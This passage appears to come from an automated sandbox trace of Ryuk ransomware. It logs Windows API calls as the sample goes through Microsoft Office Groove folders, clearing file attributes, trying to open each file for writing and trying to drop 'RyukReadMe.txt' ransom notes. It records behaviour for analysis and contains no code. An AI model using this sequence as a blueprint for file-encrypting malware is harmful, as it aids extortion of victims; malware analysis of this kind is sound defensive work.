dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.146] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.146] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\RTF_BOLD.GIF", dwFileAttributes=0x80) returned 0 [0137.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\RTF_BOLD.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_bold.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.147] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.147] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.147] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.147] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_bullets.gif", dwFileAttributes=0x80) returned 0 [0137.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_bullets.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_bullets.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.148] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.148] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.148] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.148] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.148] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_center.gif", dwFileAttributes=0x80) returned 0 [0137.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_center.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_center.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.149] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.149] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.149] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.149] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.149] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_choosecolor.gif", dwFileAttributes=0x80) returned 0 [0137.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_choosecolor.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_choosecolor.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.150] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.150] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.150] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.150] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_choosefont.gif", dwFileAttributes=0x80) returned 0 [0137.150] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_choosefont.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_choosefont.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.150] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.150] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.150] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.150] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_decreaseindent.gif", dwFileAttributes=0x80) returned 0 [0137.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_decreaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_decreaseindent.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.151] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.151] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.151] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.151] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_increaseindent.gif", dwFileAttributes=0x80) returned 0 [0137.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_increaseindent.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_increaseindent.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.152] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.152] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.152] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.152] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.152] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_italic.gif", dwFileAttributes=0x80) returned 0 [0137.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_italic.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_italic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.153] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.153] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.153] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.153] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.153] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_justify.gif", dwFileAttributes=0x80) returned 0 [0137.153] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_justify.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_justify.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.154] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.154] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.154] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.154] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.154] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_pressed.gif", dwFileAttributes=0x80) returned 0 [0137.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_pressed.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_pressed.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.155] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.155] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.155] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.155] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_underline.gif", dwFileAttributes=0x80) returned 0 [0137.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\rtf_underline.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\rtf_underline.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.157] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.157] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.158] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.158] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SAVE.GIF", dwFileAttributes=0x80) returned 0 [0137.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SAVE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\save.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.158] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.158] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.158] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.158] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SUBMIT.JS", dwFileAttributes=0x80) returned 0 [0137.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SUBMIT.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\submit.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.159] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.159] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.159] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.159] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\utilityfunctions.js", dwFileAttributes=0x80) returned 0 [0137.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\utilityfunctions.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.159] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.159] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.159] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.159] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\validation.js", dwFileAttributes=0x80) returned 0 [0137.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\validation.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.160] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.160] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.160] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.160] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO", dwFileAttributes=0x80) returned 0 [0137.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.160] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.160] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.160] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.160] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.JS", dwFileAttributes=0x80) returned 0 [0137.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.161] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.161] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.161] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.161] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg", dwFileAttributes=0x80) returned 0 [0137.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\viewheaderpreview.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.161] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.162] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.162] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0137.162] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0137.162] SetLastError (dwErrCode=0x0) [0137.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.162] GetLastError () returned 0x5 [0137.162] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.162] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.162] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0137.162] SetLastError (dwErrCode=0x0) [0137.162] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.162] GetLastError () returned 0x5 [0137.162] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0137.162] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.162] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2d00 [0137.164] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.165] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.165] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.165] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ADD.GIF", dwFileAttributes=0x80) returned 0 [0137.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\ADD.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\add.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.166] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.166] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.166] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.166] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.166] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\AddToViewArrow.jpg", dwFileAttributes=0x80) returned 0 [0137.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\addtoviewarrow.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.166] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.166] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.166] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.166] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\AddToViewArrowMask.bmp", dwFileAttributes=0x80) returned 0 [0137.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\AddToViewArrowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\addtoviewarrowmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.167] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.167] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.167] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.167] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.167] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\attention.gif", dwFileAttributes=0x80) returned 0 [0137.167] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\attention.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\attention.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.167] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.167] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.168] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.168] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.168] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\BG_ADOBE.GIF", dwFileAttributes=0x80) returned 0 [0137.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\BG_ADOBE.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_adobe.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.168] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.168] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.168] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.168] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.168] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Casual.gif", dwFileAttributes=0x80) returned 0 [0137.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Casual.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_casual.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.169] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.169] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.169] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0137.169] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.169] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Country.gif", dwFileAttributes=0x80) returned 0 [0137.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\bg_Country.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\bg_country.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 